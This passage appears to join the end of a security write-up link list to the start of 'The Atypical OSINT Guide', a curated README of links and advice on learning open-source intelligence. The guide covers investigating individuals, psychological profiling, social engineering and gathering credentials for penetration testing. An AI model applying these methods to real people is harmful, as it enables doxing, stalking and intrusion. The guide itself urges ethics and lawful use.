postMessage and WebSocket](https://labs.detectify.com/2017/02/28/hacking-slack-using-postmessage-and-websocket-reconnect-to-steal-your-precious-token/) - [Frans Rosén](https://twitter.com/fransrosen) 8. [Stealing Messenger.com Login Nonces](https://stephensclafani.com/2017/03/21/stealing-messenger-com-login-nonces/) - [ Stephen Sclafani](https://twitter.com/Stephen) 9. [Escaping a Python sandbox with a memory corruption bug](https://medium.com/@gabecpike/python-sandbox-escape-via-a-memory-corruption-bug-19dde4d5fea5) - [Gabe Pike](#) 10. [Uploading web.config for Fun and Profit 2](https://soroush.secproject.com/blog/2019/08/uploading-web-config-for-fun-and-profit-2/) - [Soroush Dalili](https://twitter.com/irsdl) ###### Extras 1. [Everything you need to know about HTTP security headers](https://blog.appcanary.com/2017/http-security-headers.html) 2. [Helmet JS](https://helmetjs.github.io/docs/) 3. [GitHub's post-CSP journey](https://githubengineering.com/githubs-post-csp-journey/) - [Patrick Toomey](https://twitter.com/patricktoomey) 4. [CORS — a guided tour](https://medium.com/statuscode/cors-a-guided-tour-4e72230a8739#.bqddn2c22) - [Martin Splitt](#) #### Credits ###### Categories - [LtR101: Web Application Testing Methodologies](https://blog.zsec.uk/ltr101-methodologies/) - [Andy](https://twitter.com/ZephrFish) ## Stargazers over time [![Stargazers over time](https://starchart.cc/dhaval17/awsome-security-write-ups-and-POCs.svg)](https://starchart.cc/dhaval17/awsome-security-write-ups-and-POCs)
# The Atypical OSINT Guide #### The most unusual OSINT guide you've ever seen. The repository is intended for bored professionals only. #### PRs are welcome! Feel free to submit a pull request, with anything from small fixes to translations, docs or tools you'd like to add. > **Disclaimer: All information (tools, links, articles, text, images, etc.) is provided for educational purposes only! All information is also based on data from public sources. You are solely responsible for your actions, not the author** ❗️ [![Support Project](https://img.shields.io/badge/Support-Project-critical)](https://github.com/OffcierCia/support/blob/main/README.md) [![Supported by GitCoin](https://img.shields.io/badge/Support%20via-GitCoin-yellowgreen)](https://gitcoin.co/grants/3150/defi-developer-roadmap) [![Research Base](https://img.shields.io/badge/Research-Base-lightgrey )](https://github.com/OffcierCia/ultimate-defi-research-base) [![Mail](https://img.shields.io/badge/Mail-offcierciapr%40protonmail.com-brightgreen)](mailto:offcierciapr@protonmail.com) | Section | Link | |-------------------------------------------|--------------------------------------------------------------------------------------------------------| | Introduction: Civil OSINT | [Explore](https://github.com/OffcierCia/non-typical-OSINT-guide#introduction-civil-osint) | | Immersive & Gamified Learning: Tricks (a) | [Explore](https://github.com/OffcierCia/non-typical-OSINT-guide#immersive--gamified-learning-tricks-a) | | Training & Practicing | [Explore](https://github.com/OffcierCia/non-typical-OSINT-guide#training--practicing) | | Choosing a Pathway to Follow... | [Explore](https://github.com/OffcierCia/non-typical-OSINT-guide#choosing-a-pathway-to-follow) | | Immersive & Gamified Learning: Games (b) | [Explore](https://github.com/OffcierCia/non-typical-OSINT-guide#immersive--gamified-learning-games-b) | | Work (A-Z) | [Explore](https://github.com/OffcierCia/non-typical-OSINT-guide#work-a-z) | | External Data | [Explore](https://github.com/OffcierCia/non-typical-OSINT-guide#external-data) | | Support Project | [Explore](https://github.com/OffcierCia/non-typical-OSINT-guide#support-project) | # Start Here **Check out:** - [Navigation (my articles)](https://officercia.mirror.xyz/Uc1sf64yUCb0uo1DxR_nuif5EmMPs-RAshDyoAGEZZY) - [Original Article](https://officercia.mirror.xyz/5KSkJOTgMtvgC36v1GqZ987N-_Oj_zwvGatOk0A47Ws) - [Also posted here!](https://officercia.medium.com/the-atypical-osint-guide-2023-276a8d00959) Today I would like to talk about how to become a good OSINT investigator, but to continue the conversation I would like to make a small disclaimer - I will tell you only some aspects because the topic is very vast and I can not describe everything in a single guide, however, I will try to show you the way and how to pass this path. This manual is the culmination of years of work by OSINT professionals. Consider this guidebook to be a compilation of advice and routes! Keep in mind, this essay is intended to be instructional! Consider your actions carefully or you will be prosecuted or worse! Always keep in mind Ethics & related Laws - like GDPR, etc… You should not romanticize OSINT and on-chain investigations in the same manner that individuals often romanticize hacking and warfare, I highly encourage you! - [Boston bombing: How internet detectives got it very wrong](https://www.bbc.com/news/technology-22214511) - [OSINT? WTF??](https://ohshint.gitbook.io/oh-shint-its-a-blog/osint/osint-wtf) > Last but not least, everything you do is based on the outcomes you need to achieve! You should be able to select reliable and vetted sources instead of using all the tools and links. Through given routes, you ought to be able to construct your own journey! Following that, I will tell you about the ways that I deem safe and recommend to my clients! OSINT professionals have spent decades developing this manual, sharing their expertise in every word. Once again, consider this guidebook to be a compilation of advice and routes. It is also crucial to note that OSINT is merely another means to learn about the world around you and is not a way to "get paid instantly." Always take a break to recharge! Your health & mind are important! - [How to know when to stop](https://www.lennysnewsletter.com/p/how-to-know-when-to-stop) - [How to Become a 1000 Year Old Vampire](https://www.lesswrong.com/posts/5QpufhoH2ASnppsjs/how-to-become-a-1000-year-old-vampire) - [How To Learn Fast](https://degatchi.com/articles/how-to-learn-fast/) - [How to Use Mind Maps to Unleash Your Brain's Creativity and Potential](https://lifehacker.com/how-to-use-mind-maps-to-unleash-your-brains-creativity-1348869811) - [Can everybody do OSINT?](https://medium.com/osintfun/can-everybody-do-osint-f5d5e6128445) - [Vicarious trauma](https://osintcurio.us/2020/06/08/vicarious-trauma-and-osint-a-practical-guide/) This information does not make you better or worse. Humanity as a species has a proclivity to adapt to its surroundings, which, as we all know, begins with knowledge, observations, and methodology. Take care of yourself, consider the consequences of your actions, and respect the privacy of others. Do not cross red lines! <details> <summary>Expand</summary> <br /> - [OSINT + Crypto](https://www.forensicxs.com/blockchain-osint-decentraland/) - [Here we discuss how one can investigate crypto hacks and security incidents!](https://github.com/OffcierCia/On-Chain-Investigations-Tools-List) - [osint.sh All in One OSINT Tools List](https://osint.sh/) - [The Not Yet Exploited Goldmine of OSINT: Opportunities, Open Challenges and Future Trends](https://www.researchgate.net/publication/338495014_The_Not_Yet_Exploited_Goldmine_of_OSINT_Opportunities_Open_Challenges_and_Future_Trends) </details> Always think twice before acting, follow the law, and follow the OpSec rules. If you want to help or conduct social investigations but lack experience, please reach out to more experienced people so that you do not harm the victims or those attempting to save them. In my articles, on the other hand, I reveal a different application of OSINT, inspired by due diligence and civil financial intelligence, with a focus on **civilian** applications. That is my vision, which I hope you will embrace... - [Intelligence Studies: Types of Intelligence Collection](https://usnwc.libguides.com/c.php?g=494120&p=3381426) - [Understanding the Different Types of Intelligence Collection Disciplines](https://www.maltego.com/blog/understanding-the-different-types-of-intelligence-collection-disciplines/) - [inteltechniques.com](https://inteltechniques.com) - [A History of OSINT: From Informing Spies to Detecting Lies](https://www.skopenow.com/news/a-history-of-osint) - [Open Source Intelligence Investigation: From Strategy to Implementation](https://www.researchgate.net/publication/321531302_Open_Source_Intelligence_Investigation_From_Strategy_to_Implementation) - [Rverse Image Search](https://www.numlookup.com/reverse-image-search) ### **May the Force be with you!** # Introduction: Civil OSINT To begin with, I want to say that I will consider OSINT as a set of skills or a mindset, because it can be directly related to doxing, military GEO-INT performed by a security company employee or just media OSINT performed by a VC fund employee in order to find new projects for investment, taking the theory of handshakes as a basis... - [OSINT Is A State Of Mind](https://medium.com/secjuice/osint-as-a-mindset-7d42ad72113d) - [Cognitive Bias and Critical Thinking in Open Source Intelligence (OSINT)](https://deepsec.net/docs/Slides/2014/Cognitive_Bias_and_Critical_Thinking_in_Open_Source_Intelligence_(OSINT)_-_Benjamin_Brown.pdf) - [A Brief History of Open Source Intelligence](https://www.bellingcat.com/resources/articles/2016/07/14/a-brief-history-of-open-source-intelligence/) - [How OSINT powered the largest criminal investigation in US history](https://www.isdglobal.org/digital_dispatches/jan-6-series-how-osint-powered-the-largest-criminal-investigation-in-us-history/) ...Or even a crypto-forensics specialist investigating a major Web3.0 hack case. In other words, it can be used in all spheres of life because it is only a method of working with, assessing and ranking information - do not ever forget that we are all living in the Information Era. <details> <summary>Expand</summary> <br /> - [Meet the Blockchain Detectives Who Track Crypto’s Hackers and Scammers](https://www.vice.com/en/article/xgd9zw/meet-the-blockchain-detectives-who-track-cryptos-hackers-and-scammers) - [Special «Blockchain Investigations» Compilation](https://t.me/officer_cia/236) - [How I investigate crypto hacks and security incidents: A-Z](https://officercia.mirror.xyz/BFzv17UwH6QG4q711NAljtSiP8eKR17daLjTdmAgbHw) - [On-Chain Investigations Handbook](https://github.com/OffcierCia/On-Chain-Investigations-Tools-List) - [The Beginner’s Guide to Open-Source Intelligence (OSINT): Techniques and Tools](https://medium.com/@mohitdeswal_35470/the-beginners-guide-to-open-source-intelligence-osint-techniques-and-tools-6a91b9c37ee1) - [Awesome Intelligence](https://github.com/ARPSyndicate/awesome-intelligence) </details> All of what I said above you can develop in yourself, but the essence of all directions is the same - the ability to notice valuable information, anomalies, see the differences, carefully analyze the facts and build a logical chain - while being in the flow of information. Start up from checking out your own info and your own data: make an OSINT research against yourself. Collect all data, visualize it, then, erase - with using SERM/ORM techniques. - [SERM](https://thebusinessprofessor.com/seo-social-media-direct-marketing/search-engine-reputation-management-definition) - [ORM](https://medium.com/elfsight-blog/introduction-to-search-engine-reputation-management-serm-44467c891c0b) - [Examples of opsec and privacy fails when doing OSINT](https://www.osintme.com/index.php/2022/01/17/examples-of-opsec-and-privacy-fails-when-doing-osint/) - [WhatBreach](https://github.com/Ekultek/WhatBreach) - [More OpSec Studies](https://github.com/lawsecnet/OPSEC) - [Basic OPSEC Tips & Tricks for OSINT researchers](https://web.archive.org/web/20221108024236/https://osintcurio.us/2019/04/18/basic-opsec-tips-and-tricks-for-osint-researchers/amp/) - [The Osint Me ultimate guide to Telegram OSINT and privacy](https://www.osintme.com/index.php/2022/10/18/the-osint-me-ultimate-guide-to-telegram-osint-and-privacy/) - [Dork yourself before “someone” does](https://osintteam.blog/dork-yourself-before-someone-does-aa49d0c1929f) I would like to give you the first lesson, all resources which I will advise you - I studied by myself earlier: - [So You Think You Can Google? - Workshop With Henk van Ess](https://youtu.be/uyqXS5lL-mc) - [OSINT Origins #1 - Jean-Marc Manach/@manhack](https://youtu.be/XrTFzZ77eEI) - [An Awesome OSINT Mind-map](http://files.mtg-bi.com/MindMap.jpg) - [Telegram & Discord Security Best Practices](https://officercia.mirror.xyz/dlf6ZEXq3FLE21ZY2jeJ0cBDyuZu8XIF9DEJAQ07nk8) - [A definitive guide to generating usernames for OSINT purposes](https://github.com/soxoj/username-generation-guide) - [Resisting Deterministic Thinking](https://zephoria.medium.com/resisting-deterministic-thinking-52ef8d78248c) # Mind-Mapping First, let's break down such a concept as mind-mapping. It is very important to teach how to sort information according to different criteria, I believe you can practice sorting absolutely any information you’d like! - [Mind-map](https://en.wikipedia.org/wiki/Mind_map) - [What do you need to become an intermediate OSINTer? How can Shodan contribute to OSINT investigations?](https://podtail.com/en/podcast/osintcurious/episode-51-what-do-you-need-to-become-an-intermedi/) - [First Steps to Getting Started in Open Source Research](https://www.bellingcat.com/resources/2021/11/09/first-steps-to-getting-started-in-open-source-research/) - [Everything about Open Source Intelligence and OSINT Investigations](https://www.maltego.com/blog/what-is-open-source-intelligence-and-how-to-conduct-osint-investigations/) **[What is Maltego and why use it for OSINT?](https://wondersmithrae.medium.com/a-beginners-guide-to-osint-investigation-with-maltego-6b195f7245cc)** Maltego is a data mining tool that mines a variety of open-source data resources and uses that data to create graphs for analyzing connections. The graphs allow you to easily make connections between information such as name, email organizational structure, domains, documents, etc. Maltego uses Java so it can run on Windows, Mac, and Linux and is available in many OSINT Linux distros like Buscador or Kali. Basically, it will parse a large amount of information and search various open-source websites for you and then toss out a pretty looking graph that will help you put the pieces together. Maltego can be used as a resource at any point during the investigation however if your target is a domain it makes sense to start mapping the network with Maltego from the start. #### Didn't everyone make cheat sheets at school? It's time to do it again, because in the future it should evolve into a Maltego skill! - [Top OSINT & Infosec Resources for You and Your Team (2022 Edition): 100+ Blogs, Podcasts, YouTube, Books, and more!](https://www.maltego.com/blog/top-osint-infosec-resources-for-you-and-your-team/) - [A Beginner’s Guide to OSINT Investigation with Maltego](https://wondersmithrae.medium.com/a-beginners-guide-to-osint-investigation-with-maltego-6b195f7245cc) - [Maltego - Cyber Weapons Lab - Research like an OSINT Analyst](https://youtu.be/46st98FUf8s) - [Free Digital Badges for learning / developing OSINT Skills](https://www.reddit.com/r/OSINT/comments/kgew5d/free_digital_badges_for_learning_developing_osint/) - [Tips To Encourage Your Child To Participate In Extracurricular Activities](https://talentgum.com/blog/tips-to-encourage-your-child-to-participate-in-extracurricular-activities) - [What skills do you need to be good at chess + how to improve it.](https://skillspointer.com/skills-for-chess/) > A tiny tip - perform [power-searching](https://www.edx.org/course/power-searching-with-google) with using different IPs, over different time ranges and via different [search engines](https://github.com/tasos-py/Search-Engines-Scraper). ## Understanding OSINT Fundamentals, according to [VEEXH](https://wondersmithrae.medium.com/a-beginners-guide-to-osint-investigation-with-maltego-6b195f7245cc): - a. Grasp the concept of OSINT and its significance in intelligence gathering. - b. Familiarize yourself with the types of OSINT sources (e.g., social media, public records, online forums, news outlets). - c. Learn the ethical and legal considerations when collecting OSINT. **Developing Technical Skills:** - a. Acquire proficiency in basic computer and internet usage. - b. Learn advanced search techniques using search engines and operators. - c. Understand the importance of anonymity and acquire skills in using VPNs, proxies, and the Tor network. - d. Familiarize yourself with essential OSINT tools, such as Maltego, Shodan, and Google Dorks. **Mastering OSINT Collection:** - a. Learn how to identify and prioritize intelligence requirements. - b. Develop a systematic approach to collecting data from various sources. - c. Hone your skills in social engineering, passive reconnaissance, and online reconnaissance. - d. Acquire expertise in geolocation, imagery analysis, and tracking down information on individuals and organizations. **OSINT Analysis and Evaluation:** - a. Learn various analysis techniques, such as link analysis, timeline analysis, and sentiment analysis. - b. Develop critical thinking and cognitive bias awareness. - c. Understand the significance of the intelligence cycle and apply it to OSINT analysis. - d. Evaluate the credibility and reliability of sources and information. **OSINT Dissemination and Reporting:** - a. Familiarize yourself with the principles of effective communication. - b. Learn how to create intelligence reports, briefs, and visualizations. - c. Understand the importance of tailoring your reporting to different audiences. - d. Develop the ability to present findings in a clear, concise, and actionable manner. **Continuous Improvement and Networking:** - a. Stay updated on the latest OSINT trends, tools, and techniques. - b. Participate in relevant online communities, forums, and social media groups. - c. Attend OSINT conferences, workshops, and webinars. By following this framework, beginners can systematically develop their OSINT skills and become proficient in open source intelligence collection, analysis, and dissemination. OSINT (Open-source Intelligence) is also a crucial stage of the penetration testing process. A thorough examination of publicly available information can increase the chances of finding a vulnerable system, gaining valid credentials through password spraying, or gaining a foothold via social engineering. # Immersive & Gamified Learning: Tricks (a) I can also recommend that you turn to an interesting subculture that is suitable for introverts! I am sure that everyone is interested in various strange phenomena in one way or another. Immerse yourself in a net-stalking environment! Sometimes ordinary people were able to solve crimes which the police could not solve for years with OSINT and GEOINT alone (I could put in here links to subreddits, movies and news but since you and I are now doing OSINT I advise you to find it on your own). <details> <summary>Expand</summary> <br /> - [What is Netstalking?](https://graph.org/What-is-Netstalking-Netstalking-Information-Survivors-04-06) - [GEOGUESSR](https://somerandomstuff1.wordpress.com/2019/02/08/geoguessr-the-top-tips-tricks-and-techniques/) - [SunCalc Calculator](http://suncalc.net/) - [Mind Hacks – Psychological profiling, and mental health in OSINT investigations](https://youtu.be/104WpJm_eGk) - [A Method for Teaching Open Source Intelligence (OSINT) Using Personalised Cloud-based Exercises](https://www.researchgate.net/publication/340023320_A_Method_for_Teaching_Open_Source_Intelligence_OSINT_Using_Personalised_Cloud-based_Exercises) - [Attack Simulations Method: Example](https://istrosec.com/service/attack-simulations/) </details> **Also check out:** - [Alternate Reality Game](http://en.wikipedia.org/wiki/Alternate_reality_game) - [reddit.com/r/ARG](http://reddit.com/r/ARG) - [Net.art](https://officercia.mirror.xyz/VD9IDI8b4jVBHbr5uaGcI_ev6NEKZUuuOhL9IpEfpZs) - [Applied Anthropology Research Methods](https://en.wikipedia.org/wiki/Applied_Anthropology_Research_Methods) - [Reflections on Becoming an Applied Anthropologist](https://www.jstor.org/stable/25605413) - [Applied Anthopology (really, study it!)](https://oxfordre.com/anthropology/browse;jsessionid=469E22D5E27E148C59A31BA5715AD18D?page=3&pageSize=20&sort=titlesort&subSite=anthropology&t0=ORE_ANT%3AREFANT001) The main thing to remember is your health, it is above all, do not let your principles be shaken by what you see. You are an observer! Here well helps to understand the psychology of [SCP researchers](https://scp-wiki.wikidot.com/) (when nothing is clear, but the scientific method helps to put everything in its place). <details> <summary>Expand</summary> <br /> - [Netstalking: In-Depth](https://graph.org/What-is-Netstalking-Netstalking-Information-Survivors-04-06) - [How I found early Solana ecosystem Developers using OSINT tactics](https://telegra.ph/How-I-found-early-Solana-ecosystem-Developers-using-OSINT-tactics-01-04) - [The Hitchhiker’s Guide to Online Anonymity](https://web.archive.org/web/20220302223645/https://anonymousplanet.org/guide.html) - [OpSec researches and data terminals - contributions are welcome.](https://github.com/OffcierCia/Crypto-OpSec-SelfGuard-RoadMap) - [Dork Yourself Before Someone Does!](https://yvesei.medium.com/dork-yourself-before-someone-does-aa49d0c1929f) </details> Keep in mind that in this part of the Global Internet (I mean OSINT in general, not only the Net-stalking), the percentage of people who are actively looking for problems or need to express their emotions is no different from other places! - [Act like a Lion 🦁](https://twitter.com/jpurd17/status/1648669362910552067?s=20) - [obsidian.md OSINT Templates](https://github.com/WebBreacher/obsidian-osint-templates) - [OSINT Browser Extensions](https://github.com/cqcore/OSINT-Browser-Extensions) **Science + OSINT:** - [Peering into the Mind: Psychological Profiling Through AI and Large Language Models..](https://www.linkedin.com/pulse/peering-mind-psychological-profiling-through-ai-large-smith) - [Occam’s razor](https://www.britannica.com/topic/Occams-razor) - [How Occam's Razor Works](https://science.howstuffworks.com/innovation/scientific-experiments/occams-razor.htm) - [Occam's Razor as a Scientific Principle](https://study.com/learn/lesson/occams-razor-scientific-principle.html#:~:text=Occam's%20Razor%20is%20a%20principle%20which%20states%20that%20plurality%20should,used%20a%20little%20more%20loosely.) - [CASE STUDY: Personality Profiling and the Power of OSINT](https://brightplanet.com/2016/11/09/case-study-receptiviti-power-osint/) - [An Enriched Threat Intelligence Platform for improving OSINT correlation, analysis, visualization and sharing capabilities](https://www.sciencedirect.com/science/article/abs/pii/S2214212620308589) - ['Deduction' vs. 'Induction' vs. 'Abduction'](https://www.merriam-webster.com/words-at-play/deduction-vs-induction-vs-abduction) - [The Difference Between Deductive and Inductive Reasoning](https://danielmiessler.com/p/the-difference-between-deductive-and-inductive-reasoning/) - [Induction Rhetoric](https://www.studysmarter.co.uk/explanations/english/rhetoric/induction-rhetoric/) - [Deductive and Inductive Reasoning: Definition, Differences & Examples](https://mundanopedia.com/economics/microeconomics/deductive-and-inductive-reasoning-methods/) **Practising:** > So, follow OpSec rules and don't make too many mistakes. Conduct your activities from a separate, isolated device. - [Privacy Concerns and Acceptance Factors of OSINT for Cybersecurity: A Representative Survey](https://petsymposium.org/popets/2023/popets-2023-0028.pdf) - [What Are Heuristics?](https://www.verywellmind.com/what-is-a-heuristic-2795235) - [Call of PSYOPS](https://steemit.com/news/@rusticus/call-of-psyops-video-games-as-psychological-warfare-in-the-21st-century) - [OSINT Trends for 2023 and Beyond](https://blog.sociallinks.io/osint-trends-for-2023-and-beyond/) - [The Wide-Ranging Uses of OSINT in Military Intelligence](https://blog.sociallinks.io/uses-of-osint-in-military-intelligence/) - [Publicly Available Information (PAI) Explained](https://www.babelstreet.com/blog/pai-explained) - [Publicly Available information: The Digital Battlefield](https://censa.net/publications/publicly-available-information-the-digital-battlefield/) - [Better Utilizing Publicly Available Information](https://www.jstor.org/stable/pdf/resrep20002.7.pdf) - [Practices of Science: False Positives and False Negatives](https://manoa.hawaii.edu/exploringourfluidearth/chemical/matter/properties-matter/practices-science-false-positives-and-false-negatives) - [False Positives and False Negatives in Information Security](https://www.guardrails.io/blog/false-positives-and-false-negatives-in-information-security/) - [Minimize False Positives in Your OSINT Investigations](https://mediasonar.com/reports/minimize-false-positives-osint-investigations/) **Cognitive bias mitigation & decision-making when doing OSINT:** There are no perfect practitioners-analysts, everyone makes mistakes and gets into difficult ambiguous situations (at least once in their life), all the more in conditions of acutely intensive and chronic work overload. And it is absolutely necessary for a practitioner-analyst to know and understand such situations. Cognitive vulnerabilities (in the established understanding) are exposures and/or tendencies to defects in thinking: significant cognitive distortions, erroneous beliefs, cognitive biases (biases), or stereotyped patterns of thinking that create the basis for a person's predisposition to cognitive failures and lead to distortions and dysfunctions of [thought processes](https://telegra.ph/Cognitive-vulnerabilities-of-the-practitioner-analyst-04-17). - [Cognitive vulnerabilities of the practitioner-analyst](https://telegra.ph/Cognitive-vulnerabilities-of-the-practitioner-analyst-04-17) - [Cognitive Bias Mitigation](https://www.researchgate.net/publication/317702457_Cognitive_Bias_Mitigation) - [Cognitive bias mitigation - Wiki](https://en.m.wikipedia.org/wiki/Cognitive_bias_mitigation) - [Recognizing and Mitigating Cognitive Biases: A Threat to Objectivity](https://www.theiia.org/en/content/communications/press-releases/2022/may/new-recognizing-and-mitigating-cognitive-biases-a-threat-to-objectivity/) - [Cognitive Bias Mitigation: How to Make Decision-Making Rational?](https://ideas.repec.org/p/fau/wpaper/wp2020_01.html) - [The Impact of Cognitive Biases on Professionals’ Decision-Making: A Review of Four Occupational Areas](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC8763848/) - [HARKing: hypothesizing after the results are known](https://pubmed.ncbi.nlm.nih.gov/15647155/) - [Hypothesizing after the results are known (HARKing)](https://embassy.science/wiki/Theme:Cc742a7b-826d-4201-b33e-457f2ef79fb9) & [Paper](https://www2.psych.ubc.ca/~schaller/528Readings/Kerr1998.pdf) - [Cognitive vulnerability](https://en.m.wikipedia.org/wiki/Cognitive_vulnerability) - [Why do we focus on one characteristic to compare when choosing between alternatives?](https://thedecisionlab.com/biases/take-the-best-heuristic) & [More](https://fourweekmba.com/take-the-best-heuristic/) - [IARPA's plan to hack the brains of hackers](https://fcw.com/security/2023/04/iarpas-plan-hack-brains-hackers/385123/) - [Are Cyber Attackers Thinking Fast and Slow?](https://journals.sagepub.com/doi/pdf/10.1177/1071181319631096) - [DMBOK2](https://www.dama.org/cpages/body-of-knowledge) - [US Comission Report - 2005](https://govinfo.library.unt.edu/wmd/about.html) - [5 Cognitive Biases could affect your OSINT investigations](https://www.linkedin.com/pulse/5-cognitive-biases-could-affect-your-osint-investigations-?utm_source=share&utm_medium=guest_mobile_web&utm_campaign=copy) Most of us experience 'gut feelings' we can't explain, such as instantly loving (or hating) a new property when we're househunting or the snap judgments we make on meeting new people. Now researchers say these feelings (or intuitions) - are real and we should take our hunches seriously. Don't limit yourself to one approach; don't be afraid to try experiments, but keep in mind that the outcomes of such approaches should always be **double-checked**. They serve more as learning tools than as actual advice for investigators. Visit the following websites: - [Intuition Is More Than Just A Hunch, Says New Research](https://www.sciencedaily.com/releases/2008/03/080305144210.htm) - [Intuition as Emergence: Bridging Psychology, Philosophy and Organizational Science](https://www.frontiersin.org/articles/10.3389/fpsyg.2021.787428/full) - [Intelligence Analysis: Structured Methods or Intuition?](https://www.academia.edu/4259879/Intelligence_Analysis_Structured_Methods_or_Intuition) - [The Potential of Integrating Intelligence and Intuition](https://www.thecipherbrief.com/the-potential-of-integrating-intelligence-and-intuition) - [Social Engineering and the Protection of High-Value Targets](https://www.hensoldt-analytics.com/2023/01/23/social-engineering-osint/) - [Trace My Shadow Game](https://myshadow.org/trace-my-shadow) - [What we talk about when we talk about OSINT](https://www.authentic8.com/blog/definition-of-osint) - [Publicly Available Information: The Secret to Unclassified Data, Part I](https://overthehorizonmdos.wpcomstaging.com/2019/04/08/publicly-available-information-the-secret-to-unclassified-data-part-i/) & [Copy](https://web.archive.org/web/20191117062938/https://othjournal.com/2019/04/08/publicly-available-information-the-secret-to-unclassified-data-part-i/) **Also:** **According to [wondersmith_rae](https://wondersmithrae.medium.com/training-yourself-to-be-an-analytical-thinker-476bdb7e7c99)**: In classical rhetoric, the “elements of circumstance” created by Aristotle have been used to analyze rhetorical questions for ages. They also apply to modern-day analysis and can be used as a foundation for an investigation. **(Who, what, when, where, why, in what way, by what means)** A condensed yet equally valuable version of the elements is called the “5W’s and an H” or Who, What, When, Where, Why, and How. These questions have been used in rhetoric, religious study, police investigations, journalism, and by lawyers since ancient Greece. It is said that an investigation can not be truly complete until all of the Ws and the H can be answered. Applying the same elements to our OSINT investigations we can ask and answer similar questions. By answering the 5W’s a narrative begins to emerge from our collected data. It is now up to us as analysts to connect the dots in a succinct way. The catch is, that anyone who has done research knows that when information starts to be uncovered it is easy to get stuck in a rabbit hole. - [The Power of Shutting Down Your Senses: How to Boost Your Creativity and Have a Clear Mind](https://buffer.com/resources/the-power-of-shutting-down-your-senses-how-to-boost-your-creativity-and-have-a-clear-mind/amp/) - [Training Yourself to be an Analytical Thinker](https://wondersmithrae.medium.com/training-yourself-to-be-an-analytical-thinker-476bdb7e7c99) - [Using the OSINT Mind-State for Better Online Investigations](https://www.sans.org/webcasts/atmic-talk-osint-mind-state-online-investigations-114115/) - [Latest Trends in SOCMINT, OSINT & Cyber-Psychology](https://www.toddington.com/wp-content/uploads/1Day_OSINT_Masterclass-1-1.pdf) - [5 Cognitive Biases That Could Affect Your OSINT Investigations](https://www.liferaftinc.com/blog/5-cognitive-biases-that-could-affect-your-osint-investigations) - [Citizen OSINT Analysts: Motivations of Open-Source Intelligence Volunteers](https://www.diva-portal.org/smash/record.jsf?pid=diva2%3A1670900&dswid=-6049) - [New guide on investigating and mapping perpetrators in open-source investigations](https://piac.asn.au/2023/03/29/new-guide-on-investigating-and-mapping-perpetrators-in-open-source-investigations/) - [An Overseas Businessman Died and Left Me $4.6M, So I Used OSINT & Social Engineering to Scam a Scammer](https://hatless1der.com/an-overseas-businessman-died-and-left-me-4-6m-so-i-used-osint-social-engineering-to-scam-a-scammer/) - [Cchatgpt-unlock-geolocation-data](https://www.digitaldigging.org/p/4-chatgpt-unlock-geolocation-data) - [Telegram-osint-vm-part-2](https://www.cqcore.uk/telegram-osint-vm-part-2/) - [Studies in Intelligence](https://t.me/devil_may_spy/160) - [Safeguarding OSINTers: Shielding Against Disinformation Manipulation](https://osintteam.blog/safeguarding-osinters-shielding-against-disinformation-manipulation-dfbbfbf1db08) - [Unveiling the Digital Detective: Essential OSINT Tools and Techniques for Investigators.](https://osintteam.blog/unveiling-the-digital-detective-essential-osint-tools-and-techniques-for-investigators-adf486ad2ccd) Once you can distinguish the information, sort it out then the next thing you can do is start practicing. As you know, **good practice requires good motivation**! You only need to know one thing: people think that intelligence is fixed — but it isn’t. Your brain is like a muscle; the more you use it, the more it grows. Education is no longer a one-time event, but a lifelong experience. <details> <summary>Expand</summary> <br /> - [Beginners Field Guide: Where & How to Learn OSINT](https://medium.com/the-sleuth-sheet/beginners-field-guide-where-how-to-learn-osint-bd2e11469f31) - [Traps used by cyber detectives…](https://medium.com/@ibederov_en/traps-used-by-cyber-detectives-c778b4853f1a) - [MAC Address Investigation](https://t.me/ibederov_en/18) - [The ULTIMATE Guide to Writing Intelligence Reports…](https://www.intelligence101.com/the-ultimate-guide-to-writing-intelligence-reports-complete-with-templates-examples/) - [Business Resilience Resources](https://start.me/p/wMgzM5/business-resilience) - [Person OSINT investigation workflow from a privacy perspective](https://www.osintme.com/index.php/2022/08/31/person-osint-investigation-workflow-from-a-privacy-perspective/) - [Setting Your Moral Compass: A Workbook for Applied Ethics in OSINT](https://ethicaljournalismnetwork.org/setting-your-moral-compass-a-workbook-for-applied-ethics-in-osint) - [Reddit Bureau of Investigation](https://www.reddit.com/r/RBI/) - [The Dark Arts of OSINT](https://av.tib.eu/en/media/38959) - [OSINT Wiki](https://www.reddit.com/r/OSINT/wiki/index/) - [OSINT Map](https://cipher387.github.io/osintmap) </details> **Also check out:** > [Recent surveys show](https://4discovery.com/2019/09/10/litigating-in-an-e-world-e-discovery-forensics-and-open-source-intelligence-in-legal-research/) that over 97% of businesses store data in the Cloud. Learn how to identify potential sources of Cloud data, issue discovery requests, and implement litigation holds, as well as how to preserve, collect, filter, review, and produce Cloud data. > [Information relevant](https://4discovery.com/2019/09/10/litigating-in-an-e-world-e-discovery-forensics-and-open-source-intelligence-in-legal-research/) to your case is on the Internet, usually hiding in plain sight. Business records, domain name registrations, websites, online user identities, social media posts, photos, and videos are only a search query away. Do you know how to find it? Learn how open source information can impact a broad range of matters and how to effectively identify sources of information and search for open source data. - [Criminals Language from a Psycholinguistics point of view](https://www.paperdue.com/essay/criminals-language-from-a-psycholinguistics-1851) - [USING LANGUAGE ANALYSIS FOR IDENTIFYING AND ASSESSING OFFENDERS](https://www.researchgate.net/publication/340985509_FORENSIC_PSYCHOLINGUISTICS_USING_LANGUAGE_ANALYSIS_FOR_IDENTIFYING_AND_ASSESSING_OFFENDERS) - [Forensic Psycholinguistics Using Language Analysis for Identifying and Assessing](https://criminalprofiling.com/forensic-psycholinguistics-using-language-analysis-for-identifying-and-assessing/) - [The Ultimate Guide to Human Intelligence (HUMINT)](https://www.intelligence101.com/the-ultimate-guide-to-human-intelligence-humint/) - [Undermining social engineering using open source intelligence gathering](https://www.researchgate.net/publication/283250856_Undermining_social_engineering_using_open_source_intelligence_gathering) - [Signal OSINT - SIGINT](https://worldwidescience.org/topicpages/o/osint+signals+intelligence.html) - [E-Discovery, Forensics, and Open Source Intelligence in Legal Research](https://4discovery.com/2019/09/10/litigating-in-an-e-world-e-discovery-forensics-and-open-source-intelligence-in-legal-research/) - [From Dissent to OSINT? Understanding, Influencing, and Protecting Roles, Reputation, and Revenue](https://complexdiscovery.com/from-dissent-to-osint-understanding-influencing-and-protecting-roles-reputation-and-revenue/) - [The Basics: What is e-Discovery?](https://cdslegal.com/knowledge/the-basics-what-is-e-discovery/) - [A system for organizing, collecting, and presenting open-source intelligence](https://link.springer.com/article/10.1007/s42488-022-00068-4) # Training & Practicing **Good training materials:** - 